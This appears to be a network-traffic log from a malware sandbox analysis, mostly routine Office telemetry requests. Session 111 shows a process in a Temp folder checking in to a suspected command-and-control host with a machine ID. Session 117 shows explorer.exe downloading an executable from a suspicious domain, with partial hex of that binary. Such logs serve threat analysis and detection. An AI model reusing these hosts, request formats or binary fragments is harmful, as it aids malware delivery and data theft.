
Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.4	49885	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:48 UTC	192	OUT	GET /rules/rule700401v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:49 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:48 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDCB4853F" x-ms-request-id: 8332b9fd-c01e-0079-1704-48e51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185348Z-r1cf579d778bb9vvhC1EWRs95400000005pg000000007nzc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:49 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	49893	104.21.16.9	443	8128	C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:50 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=TLY4I6X9EVCWNLO User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8772 Host: atten-supporse.biz
2024-12-08 18:53:50 UTC	8772	OUT	Data Raw: 2d 2d 54 4c 59 34 49 36 58 39 45 56 43 57 4e 4c 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 33 42 39 45 39 32 32 41 37 31 36 46 31 30 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 54 4c 59 34 49 36 58 39 45 56 43 57 4e 4c 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 4c 59 34 49 36 58 39 45 56 43 57 4e 4c 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d Data Ascii: --TLY4I6X9EVCWNLOContent-Disposition: form-data; name="hwid"683B9E922A716F1023D904AF30EFEBBC--TLY4I6X9EVCWNLOContent-Disposition: form-data; name="pid"2--TLY4I6X9EVCWNLOContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
2024-12-08 18:53:51 UTC	1015	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=iu52p2v4not192l2rumuub4aer; expires=Thu, 03-Apr-2025 12:40:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HH0wCCzNT%2BOzzBfTjESJZ9%2BmTIdo603RZ7z10TFO9tBph5yNom0g5k9aRq6GmsGhhqZokUjAHDvUahZXruv6Fwz2CnoVIWQ8Iuzj5V6Znwi4lDD9oOVSxly6UFuiJs5zSFWjmRQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eeef5ea3e775e76-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1642&rtt_var=620&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9710&delivery_rate=1778319&cwnd=208&unsent_bytes=0&cid=a9282490831b13d6&ts=928&x=0"
2024-12-08 18:53:51 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-08 18:53:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.4	49887	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:50 UTC	192	OUT	GET /rules/rule700400v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:51 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:51 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB779FC3" x-ms-request-id: fdf36bd3-a01e-0070-1e03-48573b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185351Z-r1cf579d778bb9vvhC1EWRs95400000005tg000000002nxp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:51 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.4	49888	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:50 UTC	192	OUT	GET /rules/rule700351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:51 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:51 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFD43C07" x-ms-request-id: 812207fe-e01e-0099-5703-48da8a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185351Z-r1cf579d778xq4f9hC1EWRx41g000000062g000000001hbr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:51 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.4	49889	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:50 UTC	192	OUT	GET /rules/rule700350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:51 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:51 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDD74D2EC" x-ms-request-id: a7f22c35-701e-001e-6403-48f5e6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185351Z-r1cf579d778w59f9hC1EWRze6w00000006e0000000003nk4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:51 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.4	49890	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:50 UTC	192	OUT	GET /rules/rule703901v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:51 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:51 GMT Content-Type: text/xml Content-Length: 1427 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE56F6873" x-ms-request-id: 62ef0171-501e-000a-5a03-480180000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185351Z-r1cf579d778xr2r4hC1EWRqvfs00000006400000000074tm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:51 UTC	1427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.4	49891	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:50 UTC	192	OUT	GET /rules/rule703900v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:51 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:51 GMT Content-Type: text/xml Content-Length: 1390 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE3002601" x-ms-request-id: 3c0425b1-401e-0047-7c03-488597000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185351Z-r1cf579d778xr2r4hC1EWRqvfs000000066g000000004df5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:51 UTC	1390	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.4	49894	154.216.20.243	443	4124	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:52 UTC	223	OUT	GET /WindosCPUsystem.exe HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: woo097878781.win
2024-12-08 18:53:53 UTC	275	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:53:52 GMT Content-Type: application/x-msdos-program Content-Length: 2576896 Last-Modified: Sun, 08 Dec 2024 18:17:40 GMT Connection: close ETag: "6755e2c4-275200" X-Powered-By: PleskLin Accept-Ranges: bytes
2024-12-08 18:53:53 UTC	16109	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 07 00 48 e2 55 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 4e 00 00 00 00 27 00 00 00 00 00 40 11 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 27 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEdHUg"N'@@'`
2024-12-08 18:53:53 UTC	16384	IN	Data Raw: 45 0c 4d 01 d0 48 c7 44 24 20 00 00 00 00 e8 b8 c9 ff ff 44 89 f0 83 e0 fe 83 f8 04 0f 84 71 ff ff ff 41 8b 45 04 48 03 85 00 18 00 00 48 89 85 50 0e 00 00 41 8b 45 00 48 89 85 a0 17 00 00 48 8b 8d b0 17 00 00 48 8d 85 74 17 00 00 48 89 44 24 20 48 8d 95 50 0e 00 00 4c 8d 85 a0 17 00 00 45 89 f1 e8 80 ca ff ff e9 26 ff ff ff 48 8d bd 50 0e 00 00 41 b8 d0 04 00 00 48 89 f9 31 d2 e8 8f 10 00 00 c7 85 80 0e 00 00 02 00 10 00 48 8b 8d b8 17 00 00 48 89 fa e8 01 c9 ff ff 85 c0 0f 88 9e 00 00 00 48 8b 85 f8 17 00 00 42 8b 44 30 28 48 03 85 00 18 00 00 48 89 85 d0 0e 00 00 48 8b 8d b8 17 00 00 48 8d 95 50 0e 00 00 e8 db c8 ff ff 48 8b 8d b0 17 00 00 85 c0 78 6d 48 8b 95 d8 0e 00 00 48 83 c2 10 48 c7 44 24 20 00 00 00 00 4c 8d 85 00 18 00 00 41 b9 08 00 00 00 e8 Data Ascii: EMHD$ DqAEHHPAEHHHtHD$ HPLE&HPAH1HHHBD0(HHHHPHxmHHHD$ LA
2024-12-08 18:53:53 UTC	16384	IN	Data Raw: 22 41 19 16 2b 0a 40 11 32 0d 11 11 35 33 2d 5e 1a 28 23 39 09 1d 08 07 41 0f 30 27 27 02 0c 41 35 46 05 21 3a 28 3a 3b 08 22 24 5c 12 06 5d 49 04 3e 3c 1f 48 06 07 1d 1b 3a 3f 2f 29 29 50 39 1a 46 02 05 10 11 1b 05 3f 12 1a 12 19 10 15 24 2f 41 16 05 57 1f 00 3a 32 25 2f 5a 1f 39 3a 17 34 32 3a 26 48 18 5a 42 39 1d 58 39 43 37 09 30 01 17 37 3a 20 1e 12 09 42 3f 0b 13 36 0b 5a 39 21 24 5f 2f 3f 0d 4c 35 36 2a 0c 27 1e 34 0d 2b 23 20 17 3d 34 23 0c 13 3d 1d 2e 00 38 41 33 16 19 0d 3c 1b 35 3d 27 02 3f 0d 0e 05 06 2f 57 5e 34 1d 18 1b 30 27 5d 13 21 3b 2b 39 21 5a 29 3f 11 3c 5f 31 30 18 00 01 48 1c 5d 06 33 10 05 0b 18 23 48 04 02 0d 01 5f 47 21 23 05 5e 0e 0e 13 43 23 33 10 12 07 01 2c 22 32 1c 21 19 02 35 54 1f 40 14 22 20 5b 4e 05 43 35 54 05 22 24 5a Data Ascii: "A+@253-^(#9A0''A5F!:(:;"$\]I><H:?/))P9F?$/AW:2%/Z9:42:&HZB9X9C707: B?6Z9!$_/?L56*'4+# =4#=.8A3<5='?/W^40']!;+9!Z)?<_10H]3#H_G!#^C#3,"2!5T@" [NC5T"$Z
2024-12-08 18:53:53 UTC	16384	IN	Data Raw: 04 45 3f 02 0b 0e 36 1a 31 31 06 30 0d 11 0e 22 26 1e 17 0f 31 23 26 30 15 43 4c 57 1c 53 15 0a 19 16 18 46 4f 07 42 4c 1e 14 1a 06 05 2a 2c 51 4f 48 42 5c 48 00 1d 0b 17 26 5e 02 3f 0d 5a 2d 5c 32 44 2f 34 51 4d 3a 40 5c 03 40 23 36 0a 24 18 26 3e 5d 51 2e 04 3e 20 06 4c 10 2d 41 24 14 39 31 3b 4e 37 30 41 33 03 0d 1b 39 15 32 2b 07 3f 01 31 30 03 33 06 01 03 3f 3d 1b 2c 3a 0d 13 07 03 04 06 2e 5e 2d 1c 36 34 1f 35 2d 14 28 4d 41 3c 23 30 53 26 06 5f 06 3b 48 32 58 2e 29 34 0d 0d 31 1e 09 06 04 18 23 2e 3e 44 02 29 0e 04 58 1b 12 5e 08 1c 26 21 40 47 2d 28 28 03 2c 0d 16 20 17 42 4b 2c 40 1d 21 29 19 10 2e 22 2f 0c 03 18 35 23 4c 01 2d 2c 1f 5a 1f 07 39 04 1a 28 12 39 05 1f 1e 05 3a 44 43 56 53 03 20 4e 09 57 4e 3d 02 41 08 03 32 23 34 43 16 13 19 00 49 Data Ascii: E?6110"&1#&0CLWSFOBL*,QOHB\H&^?Z-\2D/4QM:@\@#6$&>]Q.> L-A$91;N70A392+?103?=,:.^-645-(MA<#0S&_;H2X.)41#.>D)X^&!@G-((, BK,@!)."/5#L-,Z9(9:DCVS NWN=A2#4CI
2024-12-08 18:53:53 UTC	16384	IN	Data Raw: 11 31 02 39 1b 27 1e 2d 1e 2b 3e 20 30 20 07 37 2e 37 49 1f 57 26 2d 52 33 1d 3e 09 5c 27 06 31 0e 46 4c 19 30 04 4d 20 39 54 02 16 2d 36 30 5e 14 38 1b 02 15 21 0d 2c 00 00 12 29 16 3e 49 10 33 30 5f 04 30 24 2f 06 26 33 29 1e 42 26 17 5f 2f 32 31 33 0b 33 13 59 24 3a 12 01 38 2b 2c 0e 07 2c 47 4e 28 11 24 00 0a 56 5a 45 3e 13 27 5f 41 41 21 5d 17 07 5c 3a 10 27 5f 0d 5b 25 04 09 3d 20 11 1c 02 01 2f 17 44 2f 13 24 20 12 05 10 5c 41 1a 3e 54 15 1d 1e 49 0a 20 28 27 5f 3a 4d 36 38 1f 35 4b 3d 06 35 5b 54 3d 2d 31 3f 5c 33 01 3f 43 5e 23 3a 0d 5b 30 3b 22 20 36 05 4d 41 18 0c 0e 00 2b 1e 34 22 15 20 3b 27 21 51 27 23 06 2a 46 29 48 13 04 08 04 34 2f 0d 25 1a 4d 1f 39 43 31 38 1e 5a 0d 20 3e 10 3a 1b 2c 3c 0d 5e 1a 1f 06 26 57 24 0d 01 19 2a 31 0b 37 39 08 Data Ascii: 19'-+> 0 7.7IW&-R3>\'1FL0M 9T-60^8!,)>I30_0$/&3)B&_/2133Y$:8+,,GN($VZE>'_AA!]\:'_[%= /D/$ \A>TI ('_:M685K=5[T=-1?\3?C^#:[0;" 6MA+4" ;'!Q'#F)H4/%M9C18Z >:,<^&W$179
2024-12-08 18:53:53 UTC	16384	IN	Data Raw: 14 0f 32 27 3d 11 1b 37 27 0a 32 44 1a 01 13 1f 05 00 43 24 0d 46 1c 08 15 58 15 37 3f 5a 31 30 3e 21 01 22 13 24 16 1e 32 1d 31 3f 44 09 17 3c 21 23 1e 52 03 07 16 1c 09 36 1d 00 3d 13 10 29 1f 06 3e 0e 40 2c 04 26 46 0f 3c 0d 44 2f 2b 52 1f 1c 1b 07 55 47 04 5e 01 23 54 4c 01 59 29 0b 3d 11 44 34 49 51 30 3c 1b 20 52 16 0c 57 5c 20 40 26 05 33 11 15 32 20 1b 1c 04 27 21 0e 0d 21 1e 46 27 36 34 51 2f 32 3c 54 25 25 3c 5d 2d 27 26 24 09 23 1d 10 02 2e 08 35 31 39 37 21 56 3e 3c 38 3b 34 4d 28 2c 11 34 08 44 3f 0c 2f 54 04 1d 29 26 32 51 2d 09 1e 3d 5a 10 05 5a 2c 17 10 3f 21 26 43 0d 1b 37 19 42 56 0e 39 31 57 0c 29 02 00 1e 58 4c 3d 0c 3f 1d 22 2f 22 5f 28 53 0b 25 0f 16 39 37 33 18 22 21 3d 01 3b 39 2c 55 30 20 12 34 1a 15 45 21 19 01 26 0d 0b 09 0d 3b Data Ascii: 2'=7'2DC$FX7?Z10>!"$21?D<!#R6=)>@,&F<D/+RUG^#TLY)=D4IQ0< RW\ @&32 '!!F'64Q/2<T%%<]-'&$#.5197!V><8;4M(,4D?/T)&2Q-=ZZ,?!&C7BV91W)XL=?"/"_(S%973"!=;9,U0 4E!&;
2024-12-08 18:53:53 UTC	16384	IN	Data Raw: 07 12 44 1c 53 00 33 04 3a 4f 5f 16 04 00 29 3f 12 25 00 22 55 23 16 33 43 0f 3f 35 23 58 50 02 0f 27 01 47 2f 46 1d 01 33 15 31 25 18 0e 1c 20 11 22 42 3e 29 5f 5d 23 32 3f 53 54 3c 09 18 14 42 24 3d 47 4a 07 38 22 5f 15 5e 04 3b 12 03 00 0e 28 5f 0e 3f 10 0e 0f 1e 18 2b 16 00 0e 3a 2f 32 33 10 25 34 42 2d 22 47 0c 2e 2f 22 12 09 28 0d 1a 05 59 01 26 28 0d 22 2e 35 02 04 53 36 19 4e 0c 32 36 2d 51 44 24 3b 31 5d 38 11 0f 5d 55 46 13 23 1a 23 22 1d 26 1f 0e 11 1b 5c 5b 30 08 0e 38 45 22 11 50 11 2e 49 02 04 2e 13 29 13 36 15 46 42 59 0b 19 17 03 0b 14 0b 27 1a 53 55 1f 20 5e 0c 36 16 1b 1d 33 42 14 3b 3e 33 2a 27 49 1a 42 36 08 23 46 07 33 1d 22 4c 33 22 52 32 33 0e 1a 0d 02 1a 39 36 25 2a 31 52 07 3e 0c 21 2e 39 19 47 3a 16 24 3c 21 26 01 35 32 5f 41 56 Data Ascii: 